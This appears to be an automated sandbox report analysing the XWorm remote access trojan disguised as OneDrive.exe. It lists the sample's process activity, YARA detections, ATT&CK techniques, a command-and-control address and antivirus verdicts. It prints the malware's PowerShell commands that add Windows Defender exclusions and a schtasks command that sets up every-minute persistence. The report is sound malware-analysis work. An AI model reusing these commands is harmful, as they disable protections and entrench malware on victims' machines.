              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe'
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe'Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeQueries volume information: C:\Users\user\Desktop\OneDrive.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\ProgramData\OneDrive.exeQueries volume information: C:\ProgramData\OneDrive.exe VolumeInformation
              Source: C:\ProgramData\OneDrive.exeQueries volume information: C:\ProgramData\OneDrive.exe VolumeInformation
              Source: C:\ProgramData\OneDrive.exeQueries volume information: C:\ProgramData\OneDrive.exe VolumeInformation
              Source: C:\ProgramData\OneDrive.exeQueries volume information: C:\ProgramData\OneDrive.exe VolumeInformation
              Source: C:\Users\user\Desktop\OneDrive.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: OneDrive.exe, 00000000.00000002.2632377058.000000001C5C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\OneDrive.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: OneDrive.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.OneDrive.exe.c00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1321731249.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2623623977.0000000012F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2587401909.0000000002FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: OneDrive.exe PID: 6520, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\OneDrive.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: OneDrive.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.OneDrive.exe.c00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1321731249.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2623623977.0000000012F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2587401909.0000000002FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: OneDrive.exe PID: 6520, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\OneDrive.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Disable or Modify Tools              		1
              Input Capture              		2
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		11
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory13
              System Information Discovery              		Remote Desktop Protocol1
              Input Capture              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		21
              Registry Run Keys / Startup Folder              		1
              Scheduled Task/Job              		11
              Obfuscated Files or Information              		Security Account Manager221
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Registry Run Keys / Startup Folder              		2
              Software Packing              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture1
              Non-Standard Port              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets131
              Virtualization/Sandbox Evasion              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input Capture13
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
              Virtualization/Sandbox Evasion              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1487313 Sample: OneDrive.exe Startdate: 03/08/2024 Architecture: WINDOWS Score: 100 42 pastebin.com 2->42 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 56 10 other signatures 2->56 8 OneDrive.exe 15 6 2->8         started        13 OneDrive.exe 2->13         started        15 OneDrive.exe 2->15         started        17 2 other processes 2->17 signatures3 54 Connects to a pastebin service (likely for C&C) 42->54 process4 dnsIp5 44 pastebin.com 104.20.4.235, 443, 49710 CLOUDFLARENETUS United States 8->44 46 213.219.149.161, 49711, 7000 EDPNETBE Belgium 8->46 38 C:\ProgramData\OneDrive.exe, PE32 8->38 dropped 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->60 62 Protects its processes via BreakOnTermination flag 8->62 64 Bypasses PowerShell execution policy 8->64 72 2 other signatures 8->72 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 40 C:\Users\user\AppData\...\OneDrive.exe.log, CSV 13->40 dropped 66 Antivirus detection for dropped file 13->66 68 Multi AV Scanner detection for dropped file 13->68 70 Machine Learning detection for dropped file 13->70 file6 signatures7 process8 signatures9 58 Loading BitLocker PowerShell Module 19->58 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              OneDrive.exe69%VirustotalBrowse
              OneDrive.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
              OneDrive.exe100%AviraTR/Spy.Gen
              OneDrive.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\OneDrive.exe100%AviraTR/Spy.Gen
              C:\ProgramData\OneDrive.exe100%Joe Sandbox ML
              C:\ProgramData\OneDrive.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              pastebin.com0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://crl.m0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://crl.mic0%URL Reputationsafe
